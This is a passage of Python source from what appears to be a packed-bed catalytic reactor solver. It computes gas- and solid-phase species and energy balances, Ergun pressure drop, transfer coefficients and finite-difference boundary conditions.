DIFF2_T_SET_BC1 = solverSetting['d2Tdz2']['BC1']
DIFF2_T_SET_BC2 = solverSetting['d2Tdz2']['BC2']
DIFF2_T_SET_G = solverSetting['d2Tdz2']['G']
# number of collocation points
ocN = solverSetting['OrCoClassSetRes']['N']
ocXc = solverSetting['OrCoClassSetRes']['Xc']
ocA = solverSetting['OrCoClassSetRes']['A']
ocB = solverSetting['OrCoClassSetRes']['B']
ocQ = solverSetting['OrCoClassSetRes']['Q']
# init OrCoCatParticle
OrCoCatParticleClassSet = OrCoCatParticleClass(
ocXc, ocN, ocQ, ocA, ocB, varNo)
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# dimensionless analysis params
# feed concentration [kmol/m^3]
Cif = DimensionlessAnalysisParams['Cif']
# feed temperature
Tf = DimensionlessAnalysisParams['Tf']
# feed superficial velocity [m/s]
vf = DimensionlessAnalysisParams['vf']
# domain length [m]
zf = DimensionlessAnalysisParams['zf']
# particle radius [m]
rf = DimensionlessAnalysisParams['rf']
# diffusivity coefficient of component [m^2/s]
Dif = DimensionlessAnalysisParams['Dif']
# feed heat capacity at constant pressure
Cpif = DimensionlessAnalysisParams['Cpif']
# feed mass convective term of gas phase [kmol/m^3.s]
GaMaCoTe0 = DimensionlessAnalysisParams['GaMaCoTe0']
# feed mass diffusive term of gas phase [kmol/m^3.s]
GaMaDiTe0 = DimensionlessAnalysisParams['GaMaDiTe0']
# feed heat convective term of gas phase [kJ/m^3.s]
GaHeCoTe0 = DimensionlessAnalysisParams['GaHeCoTe0']
# feed heat diffusive term of gas phase [kJ/m^3.s]
GaHeDiTe0 = DimensionlessAnalysisParams['GaHeDiTe0']
# feed mass diffusive term of solid phase [kmol/m^3.s]
SoMaDiTe0 = DimensionlessAnalysisParams['SoMaDiTe0']
# feed heat diffusive term of solid phase [kJ/m^3.s]
SoHeDiTe0 = DimensionlessAnalysisParams['SoHeDiTe0']
# Reynolds number
ReNu = DimensionlessAnalysisParams['ReNu0']
# Schmidt number
ScNu = DimensionlessAnalysisParams['ScNu0']
# Sherwood number
ShNu = DimensionlessAnalysisParams['ShNu0']
# Prandtl number
PrNu = DimensionlessAnalysisParams['PrNu0']
# mass Peclet number
PeNuMa0 = DimensionlessAnalysisParams['PeNuMa0']
# heat Peclet number
PeNuHe0 = DimensionlessAnalysisParams['PeNuHe0']
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = DimensionlessAnalysisParams['MaTrCo']
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = DimensionlessAnalysisParams['HeTrCo']
# components no
# y: dimensionless species concentrations (gas & solid phases) and temperatures
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# calculate
# particle radius
PaRa = PaDi/2
# specific surface area exposed to the free fluid [m^2/m^3]
SpSuAr = (3/PaRa)*(1 - BeVoFr)
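# NOTE
# for spherical particles the external surface area per unit bed volume
# is av = 6*(1 - eps)/dp = 3*(1 - eps)/R, which is the expression above.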
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# interstitial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# superficial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate in the solid phase
Ri_z = np.zeros((zNo, reactionListNo))
Ri_zr = np.zeros((zNo, rNo, reactionListNo))
Ri_r = np.zeros((rNo, reactionListNo))
# reaction rate
# ri = np.zeros(compNo) # deprecate
# ri0 = np.zeros(compNo) # deprecate
# solid phase
ri_r = np.zeros((rNo, compNo))
# overall reaction
OvR = np.zeros(rNo)
# overall enthalpy
OvHeReT = np.zeros(rNo)
# heat capacity at constant pressure
SoCpMeanMix = np.zeros(rNo)
# effective heat capacity at constant pressure
SoCpMeanMixEff = np.zeros(rNo)
# dimensionless analysis
SoCpMeanMixEff_ReVa = np.zeros(rNo)
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (noLayer, varNoRows, varNoColumns))
# all species concentration in gas & solid phase
SpCo_mz = np.zeros((noLayer - 1, varNoRows, varNoColumns))
# all species concentration in gas phase [kmol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
# all species concentration in solid phase (catalyst) [kmol/m^3]
SpCosi_mzr = np.zeros((compNo, rNo, zNo))
# layer
for m in range(compNo):
# -> concentration [mol/m^3]
_SpCoi = yLoop[m]
SpCo_mz[m] = _SpCoi
# concentration in the gas phase [kmol/m^3]
for m in range(compNo):
for j in range(varNoRows):
if j == 0:
# gas phase
SpCoi_z[m, :] = SpCo_mz[m, j, :]
else:
# solid phase
SpCosi_mzr[m, j-1, :] = SpCo_mz[m, j, :]
# species concentration in gas phase [kmol/m^3]
CoSpi = np.zeros(compNo)
# dimensionless analysis
CoSpi_ReVa = np.zeros(compNo)
# total concentration [kmol/m^3]
CoSp = 0
# species concentration in solid phase (catalyst) [kmol/m^3]
# shape
CosSpiMatShape = (rNo, compNo)
CosSpi_r = np.zeros(CosSpiMatShape)
# dimensionless analysis
CosSpi_r_ReVa = np.zeros(CosSpiMatShape)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.zeros(rNo)
# flux
MoFli_z = np.zeros(compNo)
# NOTE
# temperature [K]
T_mz = np.zeros((varNoRows, varNoColumns))
T_mz = yLoop[noLayer -
1] if processType != "iso-thermal" else np.repeat([[0], [0]], zNo).reshape((varNoRows, varNoColumns))
# temperature in the gas phase
T_z = np.zeros(zNo)
T_z = T_mz[0, :]
# temperature in solid phase
Ts_z = np.zeros((rNo, zNo))
Ts_z = T_mz[1:]
# temperature in the solid phase
Ts_r = np.zeros(rNo)
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
dxdtMat = np.zeros((noLayer, varNoRows, varNoColumns))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(varNoColumns):
## block ##
# concentration species in the gas phase [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = _SpCoi_z # max(_SpCoi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CoSpi_ReVa[i] = rmtUtil.calRealDiLessValue(
CoSpi[i], SpCoi0_Set)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# dimensionless analysis: real value
CoSp_ReVa = np.sum(CoSpi_ReVa)
# FIXME
# concentration species in the solid phase [kmol/m^3]
# concentration list at each OC point (rNo)
for i in range(compNo):
for r in range(rNo):
_CosSpi_z = SpCosi_mzr[i][r][z]
# max(_CosSpi_z, CONST.EPS_CONST)
CosSpi_r[r][i] = _CosSpi_z
# REVIEW
# dimensionless analysis: real value
SpCoi0_r_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CosSpi_r_ReVa[r][i] = rmtUtil.calRealDiLessValue(
CosSpi_r[r][i], SpCoi0_r_Set)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.sum(CosSpi_r, axis=1).reshape((rNo, 1))
# dimensionless analysis: real value
CosSp_r_ReVa = np.sum(CosSpi_r_ReVa, axis=1).reshape((rNo, 1))
# concentration in the outer surface of the catalyst [kmol/m^3]
CosSpi_cat = CosSpi_r[0]
# dimensionless analysis
CosSpi_cat_DiLeVa = CosSpi_r[0, :]
# temperature [K]
T = T_z[z]
T_ReVa = rmtUtil.calRealDiLessValue(T, Tf, "TEMP")
# temperature in the solid phase (for each point)
# Ts[3], Ts[2], Ts[1], Ts[0]
Ts_r = Ts_z[:, z]
Ts_r_ReVa = rmtUtil.calRealDiLessValue(Ts_r, Tf, "TEMP")
# REVIEW
print("z: ", z, "T_ReVa: ", T_ReVa, " Ts_r_ReVa: ", Ts_r_ReVa)
# pressure [Pa]
P = P_z[z]
# FIXME
# velocity
# dimensionless value
# v = v_z[z]
v = 1
## calculate ##
# mole fraction in the gas phase
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi_ReVa))
# mole fraction in the solid phase
# MoFrsi_r0 = CosSpi_r/CosSp_r
MoFrsi_r = rmtUtil.moleFractionFromConcentrationSpeciesMat(
CosSpi_r_ReVa)
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# dimensionless analysis
SuGaVe_ReVa = rmtUtil.calRealDiLessValue(SuGaVe, SuGaVe0)
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = calMolarFlowRate(CoSp_ReVa, SuGaVe_ReVa, CrSeAr)
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp_ReVa*1000)
# GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# dimensionless value
GaDe_DiLeVa = rmtUtil.calDiLessValue(GaDe, GaDe0)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe_ReVa/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe_ReVa**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# FIXME
P_z[z+1] = dxdt_P*dz + P_z[z]
# REVIEW
# FIXME
# viscosity in the gas phase [Pa.s] | [kg/m.s]
GaVii = GaVii0 if MODEL_SETTING['GaVii'] == "FIX" else calTest()
# mixture viscosity in the gas phase [Pa.s] | [kg/m.s]
# FIXME
GaViMix = 2.5e-5 # f(yi,GaVi,MWs);
# kinematic viscosity in the gas phase [m^2/s]
GaKiViMix = GaViMix/GaDe
# REVIEW
# FIXME
# solid gas thermal conductivity
SoThCoMix0 = GaThCoMix0
# add loop for each r point/constant
# catalyst thermal conductivity [J/s.m.K]
# CaThCo
# membrane wall thermal conductivity [J/s.m.K]
MeThCo = 1
# thermal conductivity - gas phase [J/s.m.K]
# GaThCoi = np.zeros(compNo) # f(T);
GaThCoi = GaThCoi0 if MODEL_SETTING['GaThCoi'] == "FIX" else calTest(
)
# dimensionless
GaThCoi_DiLe = GaThCoi/GaThCoi0
# FIXME
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix = GaThCoMix0
# dimensionless analysis
GaThCoMix_DiLeVa = GaThCoMix/GaThCoMix0
# thermal conductivity - solid phase [J/s.m.K]
# assume the same as gas phase
# SoThCoi = np.zeros(compNo) # f(T);
SoThCoi = GaThCoi
# mixture thermal conductivity - solid phase [J/s.m.K]
SoThCoMix = GaThCoMix0
# dimensionless analysis
SoThCoMix_DiLeVa = SoThCoMix/SoThCoMix0
# effective thermal conductivity - gas phase [J/s.m.K]
# GaThCoEff = BeVoFr*GaThCoMix + (1 - BeVoFr)*CaThCo
GaThCoEff = BeVoFr*GaThCoMix
# dimensionless analysis
GaThCoEff_DiLeVa = BeVoFr*GaThCoMix_DiLeVa
# FIXME
# effective thermal conductivity - solid phase [J/s.m.K]
# assume identical to gas phase
# SoThCoEff0 = CaPo*SoThCoMix + (1 - CaPo)*CaThCo
# SoThCoEff = SoThCoMix*((1 - CaPo)/CaTo)
SoThCoEff = CaPo*SoThCoMix
# dimensionless analysis
# SoThCoEff_DiLeVa = GaThCoMix_DiLeVa*((1 - CaPo)/CaTo)
SoThCoEff_DiLeVa = CaPo*SoThCoMix_DiLeVa
# REVIEW
# diffusivity coefficient - gas phase [m^2/s]
GaDii = GaDii0 if MODEL_SETTING['GaDii'] == "FIX" else calTest()
# dimensionless analysis
GaDii_DiLeVa = GaDii/GaDii0
# effective diffusivity coefficient - gas phase
GaDiiEff = GaDii*BeVoFr
# dimensionless analysis
GaDiiEff_DiLeVa = GaDiiEff/GaDii0
# effective diffusivity - solid phase [m^2/s]
SoDiiEff = (CaPo/CaTo)*GaDii
# dimensionless analysis
SoDiiEff_DiLe = (CaPo/CaTo)*GaDii_DiLeVa
# REVIEW
if MODEL_SETTING['MaTrCo'] != "FIX":
### dimensionless numbers ###
# Re Number
ReNu = calReNoEq1(GaDe, SuGaVe, PaDi, GaViMix)
# Sc Number
ScNu = calScNoEq1(GaDe, GaViMix, GaDii)
# Sh Number (choose method)
ShNu = calShNoEq1(ScNu, ReNu, CONST_EQ_Sh['Frossling'])
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu, GaDii, PaDi)
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaDe[kgcat/m^3]
for r in range(rNo):
# loop
loopVars0 = (Ts_r_ReVa[r], P_z[z],
MoFrsi_r[r], CosSpi_r_ReVa[r])
# component formation rate [mol/m^3.s]
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri_zr[z, r, :] = r0
Ri_r[r, :] = rampSet*r0
# REVIEW
# add a ramp term to improve convergence
# component formation rate [kmol/m^3.s]
ri_r[r] = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_r[r])
# overall formation rate [kmol/m^3.s]
OvR[r] = np.sum(ri_r[r])
# NOTE
### enthalpy calculation ###
# gas phase
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, T_ReVa)
# Cp mixture
GaCpMeanMix = calMixtureHeatCapacityAtConstantPressure(
MoFri, GaCpMeanList)
# dimensionless analysis
GaCpMeanMix_DiLeVa = rmtUtil.calDiLessValue(
GaCpMeanMix, GaCpMeanMix0)
# effective heat capacity - gas phase [kJ/kmol.K] | [J/mol.K]
GaCpMeanMixEff = GaCpMeanMix*BeVoFr
# dimensionless analysis
GaCpMeanMixEff_DiLeVa = GaCpMeanMix_DiLeVa*BeVoFr
# solid phase
for r in range(rNo):
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
SoCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, Ts_r[r])
# Cp mixture
SoCpMeanMix[r] = calMixtureHeatCapacityAtConstantPressure(
MoFrsi_r[r], SoCpMeanList)
# effective heat capacity - solid phase [kJ/m^3.K]
SoCpMeanMixEff_ReVa[r] = CosSp_r_ReVa[r] * \
SoCpMeanMix[r]*CaPo + (1-CaPo)*CaDe*CaSpHeCa
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, Ts_r[r]))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic reaction (positive sign)
OvHeReT[r] = np.dot(Ri_r[r, :], HeReT)
# REVIEW
if MODEL_SETTING['HeTrCo'] != "FIX":
### dimensionless numbers ###
# Prandtl Number
# MW kg/mol -> g/mol
# MiMoWe_Conv = 1000*MiMoWe
PrNu = calPrNoEq1(
GaCpMeanMix, GaViMix, GaThCoMix, MiMoWe)
# Nu number
NuNu = calNuNoEq1(PrNu, ReNu)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu, GaThCoMix, PaDi)
# REVIEW
# heat transfer coefficient - medium side [J/m2.s.K]
# hs = heat_transfer_coefficient_shell(T,Tv,Pv,Pa);
# overall heat transfer coefficient [J/m2.s.K]
# U = overall_heat_transfer_coefficient(hfs,kwall,do,di,L);
# heat transfer coefficient - permeate side [J/m2.s.K]
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m^2/m^3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
# Ua = U*a
# external heat [kJ/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T_ReVa, U, a, 'kJ/m^3.s')
# NOTE
# # mass transfer between
# for i in range(compNo):
# ### gas phase ###
# # mass balance (forward difference)
# # concentration [kmol/m^3]
# # central
# Ci_c = SpCoi_z[i][z]
# # concentration in the catalyst surface [kmol/m^3]
# # CosSpi_cat
# # dimensionless analysis: real value
# Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
# SpCoi0)
# # inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_DiLeVa[i])
# # total mass transfer between gas and solid phases [kmol/m^3]
# ToMaTrBeGaSo_z = np.sum(MoFli_z)*SpSuAr
# NOTE
# velocity from global concentration
# check BC
# if z == 0:
# # BC1
# constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix/1000)
# # next node
# T_f = T_z[z+1]
# # previous node
# T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
# elif z == zNo - 1:
# # BC2
# # previous node
# T_b = T_z[z - 1]
# # next node
# T_f = 0
# else:
# # interior nodes
# T_b = T_z[z-1]
# # next node
# T_f = T_z[z+1]
# dxdt_v_T = (T_z[z] - T_b)/dz
# # CoSp x 1000
# # OvR x 1000
# dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
# ((1/T_z[z])*dxdt_P - (P_z[z]/T_z[z]**2)*dxdt_v_T) - ToMaTrBeGaSo_z*1000)
# velocity [forward value] is updated
# backward value of temp is taken
# dT/dt will update the old value
# FIXME
# v_z[z+1] = dxdt_v*dz + v_z[z]
# v_z[z+1] = v
# FIXME
v_z[z+1] = v_z[z]
# dimensionless analysis
v_z_DiLeVa = rmtUtil.calDiLessValue(v_z[z+1], vf)
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# bulk temperature [K]
T_c = T_z[z]
# REVIEW
# gas-solid interface BC
# concentration [m/s]*[m^2/s]=[1/m]
# betaC = PaRa*(MaTrCo/SoDiiEff)
# temperature
# betaT = -1*((HeTrCo*PaRa)/SoThCoEff)
# universal index [j,i]
# UISet = z*(rNo + 1)
# NOTE
for i in range(compNo):
# bulk species concentration [kmol/m^3]
Ci_c = SpCoi_z[i][z]
# species concentration at different points of particle radius [rNo]
# [Cs[3], Cs[2], Cs[1], Cs[0]]
_Cs_r = CosSpi_r[:, i].flatten()
# REVIEW
### gas phase ###
# check BC
if z == 0 and solverMeshSet is True:
# NOTE
# BC1 (normal)
BC1_C_1 = PeNuMa0[i]*dz
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC1)
elif z == 0 and solverMeshSet is False:
# NOTE
# BC1 (dense)
# i=0 is discretized based on inlet
# i=1
BC1_C_1 = PeNuMa0[i]*dzs[z]
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dzs[z], DIFF1_C_SET)
# d2Fdz2
# d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1)
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# dCdz = FiDiNonUniformDerivative1(
# dFdz_C, dzs[z], DIFF1_C_SET, zR[z])
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1, _zR_c)
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dCdz = FiDiNonUniformDerivative1(
dFdz_C, dzs[z], DIFF1_C_SET, _zR_b)
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_G, _zR_c)
elif z == zNo - 1:
# NOTE
# BC2
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# forward difference
Ci_f = Ci_b
Ci_ff = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC2)
else:
# NOTE
# normal sections
# interior nodes
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2] if z < zNo-2 else 0
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_G)
# REVIEW
# *** convective flux between fluid-solid ***
# concentration
# Ci_c = SpCoi_z[i][z]
# concentration at the catalyst surface [kmol/m^3]
CosSpi_cat_gas = _Cs_r[0]
# dimensionless analysis: real value
Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
# inward flux [kmol/m^2.s]
MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_gas)
# REVIEW
# cal differentiate
# backward difference
# dCdz = (Ci_c - Ci_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*dCdz
# central difference for dispersion
# d2Cdz2 = (Ci_b - 2*Ci_c + Ci_f)/(dz**2)
# dispersion term [kmol/m^3.s]
_dispersionFluxC = (BeVoFr*GaDii_DiLeVa[i]/PeNuMa0[i])*d2Cdz2
# concentration at the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
_inwardFlux = (1/GaMaCoTe0[i])*MoFli_z[i]*SpSuAr
# mass balance
# convective, dispersion, inward flux
# steady-state
dxdt_F = _convectiveTerm + _dispersionFluxC - _inwardFlux
dxdtMat[i][0][z] = dxdt_F
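# NOTE (editor sketch): written out, the dimensionless gas-phase species
# balance assembled above is
#   dCi*/dt* = -v* dCi*/dz* + (BeVoFr*GaDii*/PeNuMa0_i) d2Ci*/dz*2
#              - (1/GaMaCoTe0_i)*MoFli*SpSuAr
# with MoFli = MaTrCo_i*C_ref,i*(Ci* - Ci,s*) the gas-to-particle flux; the
# starred symbols are the dimensionless variables used in this solver.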
# REVIEW
### solid phase ###
# transfer from gas to solid surface and then reaction
# dimensionless analysis
# beta
# const
_alpha = rf/GaDii0[i]
_beta = MaTrCo[i]/GaDii_DiLeVa[i]
_DiLe = _alpha*_beta
_Ri = ri_r[:, i]
dxdtMat[i][1][z] = MoFli_z[i]*SpSuAr + _Ri
# NOTE
# energy balance
# bulk temperature [K]
# T_c
# T_c = T_z[z]
# REVIEW
### solid phase ###
# temperature at different points of particle radius [rNo]
# Ts[3], Ts[2], Ts[1], Ts[0]
_Ts_r = Ts_r.flatten()
# _Ts_r
# updated temperature at the gas-solid interface
Ts_r_cat_gas = _Ts_r[0]
# REVIEW
### gas phase ###
# check BC
if z == 0 and solverMeshSet is True:
# BC1
BC1_T_1 = PeNuHe0*dz
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC1)
elif z == 0 and solverMeshSet is False:
# BC1
BC1_T_1 = PeNuHe0*dzs[z]
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dzs[z], DIFF1_T_SET)
# d2Fdz2
# d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF_T_SET_BC1)
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_bb, T_b, T_c, T_f, T_ff]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dTdz = FiDiNonUniformDerivative1(
dFdz_T, dzs[z], DIFF1_T_SET, _zR_b)
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
elif z == zNo - 1:
# BC2
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# forward
T_f = T_b
T_ff = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC2)
else:
# interior nodes
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2] if z < zNo-2 else 0
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_G)
# REVIEW
# cal differentiate
# backward difference
# dTdz = (T_c - T_b)/(1*dz)
# convective term
